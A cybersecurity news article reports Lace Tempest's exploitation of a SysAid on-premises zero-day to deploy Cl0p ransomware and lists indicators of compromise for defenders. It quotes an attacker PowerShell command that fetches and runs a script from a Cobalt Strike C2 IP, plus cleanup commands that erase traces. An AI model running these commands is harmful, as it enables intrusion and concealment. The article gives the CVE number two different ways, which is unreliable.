As previously reported, SysAid disclosed a zero-day issue affecting on-premises SysAid servers. The vulnerability was found to be a path traversal vulnerability and was given CVE-2023-47426.
Additionally, SysAid stated that there were reports of Lace Tempest exploiting the vulnerability in the wild.
Moreover, Microsoft Threat Intelligence Team analysis mentioned that the Lace Tempest threat actor has exploited this vulnerability to deploy Cl0p ransomware on affected systems.
This threat actor is the same who exploited MOVEit Transfer applications and GoAnywhere MFT extortion attacks.
Rapid7 Analysis
According to the reports shared with Cyber Security News, Rapid7 has been analyzing this vulnerability on SysAid servers. SysAid’s security advisory mentioned that the threat actor used this vulnerability to upload a WAR archive consisting of WebShell and other payloads.
These were uploaded to the root of SysAid’s Tomcat web service as part of exploitation. It was also reported that the threat actors used three processes, spoolsv.exe, msiexec.exe, and svchost.exe, for exploitation purposes.
However, post-exploitation was done by deploying the MeshAgent remote administration tool and GraceWire malware on the affected devices.
SysAid claims to have 5000 customers and has been proactively communicating with them for mitigation steps. SysAid has also released patches to fix these vulnerabilities.
Is Your Storage & Backup Systems Fully Protected? – Watch 40-second Tour of SafeGuard
StorageGuard scans, detects, and fixes security misconfigurations and vulnerabilities across hundreds of storage and backup devices.
Mitigation
CVE-2023-47246, which exists in SysAid On-premises servers, can be fixed in version 23.3.36. Customers of SysAid servers are recommended to apply the necessary patches as a priority to prevent threat actors from exploiting the weaknesses on the servers.
Indicators of Compromise
Hashes
| Filename | Sha256 | Comment |
| user.exe | b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d | Malicious loader |
| Meshagent.exe | 2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4cca | Meshagent.exe remote admin tool |
IP Addresses
| IP | Comment |
| 81.19.138[.]52 | GraceWire Loader C2 |
| 45.182.189[.]100 | GraceWire Loader C2 |
| 179.60.150[.]34 | Cobalt Strike C2 |
| 45.155.37[.]105 | Meshagent remote admin tool (C2) |
File Paths
| Path | Comment |
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe | GraceWire |
| C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war | Archive of WebShells and tools used by the attacker |
| C:\Program Files\SysAidServer\tomcat\webapps\leave | Used as a flag for the attacker scripts during execution |
Commands
CobaltStrike
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)
Post-Compromise Cleanup
Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -Force “$wapps\usersfiles.war”.
Remove-Item -Force “$wapps\usersfiles\user.*”.
& “$wapps\usersfiles\user.exe”.
Antivirus Detections
Trojan:Win32/TurtleLoader
Backdoor:Win32/Clop
Ransom:Win32/Clop
Patch Manager Plus, the one-stop solution for automated updates of over 850 third-party applications: Try Free Trial.
.webp "Leicester City Cyber Attack Leads to Street Light Burning All Day & Night"){kind=small}
